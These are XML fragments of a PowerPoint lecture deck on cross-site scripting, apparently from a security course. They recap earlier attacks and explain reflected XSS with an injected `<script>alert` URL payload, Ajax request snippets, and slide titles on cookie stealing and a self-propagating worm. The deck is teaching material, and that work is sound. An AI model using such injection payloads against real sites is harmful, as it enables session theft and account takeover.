                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="753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27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5058F1-955F-8624-928E-DF27AFF8D3FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10135361" y="3886961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0" y="147827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14782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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561AABA9-6767-E499-ADB9-C38F659B8132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596254" y="3511041"/>
            <a:ext cx="6253480" cy="658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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-6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Ajax.send(content);</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="1495425" algn="r"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5" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7A985D-9F45-B987-E059-D2889F7D20D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49345" y="4838953"/>
            <a:ext cx="671956" cy="13843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C312B65-EAFD-DDEA-4080-98798B18D60E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6490157" y="1067419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(This is one entire JavaScript program)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A5C925-979B-571A-0BBB-E5BAE4FBD4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="750657"/>
            <a:ext cx="3387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tasks consists of combing the previous two tasks into one attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59723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4ED02B-AAC0-F056-AF51-548EA790396D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2286000" y="4365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XSS Countermeasures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0F815F-0C62-4FB1-1F5B-BEC4F62A3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31081"/>
            <a:ext cx="9933638" cy="4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8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438400" y="77816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Our Attacks So far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3C995-205E-4079-B700-BB4BF15A69AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584345" y="1219200"/>
            <a:ext cx="109423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Shellshock-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> We were able to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>operating system commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of our choosing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/>
              <a:t>) on someone else’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>due to unsafe environment variable parsing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Buffer Overflow-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> We were able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute arbitrary code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>by hijacking a program that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsafely writes data 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SQL Injection-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> We were able to run our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>own arbitrary SQL queries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due to unsafe user input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XSS –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> We are able to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>someone else’s browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>our own JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>due to unsafe input handling and unsafe web communication policies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CA67B-2885-88FD-716A-9E2872578FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5960912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(client-side scripts)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223630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(Reflective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3707006" y="1425559"/>
            <a:ext cx="435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http://www.website.com?input=???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250080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(Reflective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3707006" y="1425559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http://www.website.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input=hello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220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(Reflective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3707006" y="1425559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http://www.website.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input=hello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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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4EAF6C-63B0-CF2E-CDA3-80D93926B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)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2669C5-ED51-B186-2F00-FEB0FE4B00AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1905000"/>
            <a:ext cx="205740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DFAC0F-F815-8737-D87E-70C307387883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="2667000" cy="293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0977FA-DEDF-14B3-E5F3-037AADD7A643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638760" y="4020282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Gets rendered by browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382438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(Reflective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2422186" y="1432315"/>
            <a:ext cx="742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http://www.website.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input=&lt;script&gt;alert(“BAD!”);&lt;/script&gt;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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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4EAF6C-63B0-CF2E-CDA3-80D93926B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22280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(Reflective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2422186" y="1432315"/>
            <a:ext cx="742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http://www.website.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input=&lt;script&gt;alert(“BAD!”);&lt;/script&gt;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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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4EAF6C-63B0-CF2E-CDA3-80D93926B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)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21E239-D3DE-B714-340A-C9CFED2CAD9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1905000"/>
            <a:ext cx="205740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CAD9EF0-DC93-8E21-CD42-2DF313202A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="2124241" cy="293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 alert(“BAD!”);&lt;script&gt;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475DC-FA80-2288-6340-969E41085341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638760" y="4020282"/>
            <a:ext cx="3544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Gets rendered by browser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script is executed!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41028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(Reflective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2422186" y="1432315"/>
            <a:ext cx="742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http://www.website.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input=&lt;script&gt;alert(“BAD!”);&lt;/script&gt;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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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4EAF6C-63B0-CF2E-CDA3-80D93926B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)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21E239-D3DE-B714-340A-C9CFED2CAD9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1905000"/>
            <a:ext cx="205740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CAD9EF0-DC93-8E21-CD42-2DF313202A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="2124241" cy="293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 alert(“BAD!”);&lt;script&gt;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0D655E-05BA-CB7A-92BF-72D010B7DC0A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5611621" y="1693714"/>
              <a:ext cx="4109400" cy="169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0D655E-05BA-CB7A-92BF-72D010B7DC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3621" y="1676074"/>
                <a:ext cx="41450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7D00468-75F5-A9B7-285F-282D57D407E9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6578221" y="3907354"/>
              <a:ext cx="367200" cy="2130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7D00468-75F5-A9B7-285F-282D57D407E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60221" y="3889714"/>
                <a:ext cx="402840" cy="21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8580B6C-620D-A262-8949-3F0EC93F36B3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10896781" y="3975754"/>
              <a:ext cx="394920" cy="194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8580B6C-620D-A262-8949-3F0EC93F36B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78781" y="3958114"/>
                <a:ext cx="430560" cy="197784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07AFEA1-2FC5-3A71-6E53-D6AD383D91AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010401" y="4267199"/>
            <a:ext cx="3856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reflective example, the user typically issues this HTTP request by getting tricked into clicking the link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic 20" descr="Computer with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635FDC25-BF25-66FA-5CEE-EBC32F19B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220" y="3181363"/>
            <a:ext cx="1247856" cy="1247856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic 24" descr="Devil face with solid fill with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D175F1-D3DB-2E0C-3980-E8E9C80A92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9730" y="3456953"/>
            <a:ext cx="522180" cy="52218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78AFF4-D968-9695-1760-929786278127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="720109" y="2637939"/>
            <a:ext cx="445751" cy="681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2E33AD2-92DA-67CA-B723-B883A94E2B10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19043442">
            <a:off x="120122" y="275870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Click this link!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272955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4760</TotalTime>
  <Words>2417</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>320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MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman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Stealing Cookie Information via XSS</vt:lpstr>
      <vt:lpstr>Stealing Cookie Information via XSS</vt:lpstr>
      <vt:lpstr>Stealing Cookie Information via XSS</vt:lpstr>
      <vt:lpstr>Stealing Cookie Information</vt:lpstr>
      <vt:lpstr>Becoming a Victim’s friend through XSS</vt:lpstr>
      <vt:lpstr>Becoming a Victim’s friend through XSS</vt:lpstr>
      <vt:lpstr>Becoming a Victim’s friend through XSS</vt:lpstr>
      <vt:lpstr>XSS Injection to edit someone's profile</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm</vt:lpstr>
      <vt:lpstr>Self-Propagating Worm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Pearsall, Reese</cp:lastModifiedBy>
  <cp:revision>40</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-21T16:55:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-17T20:55:53Z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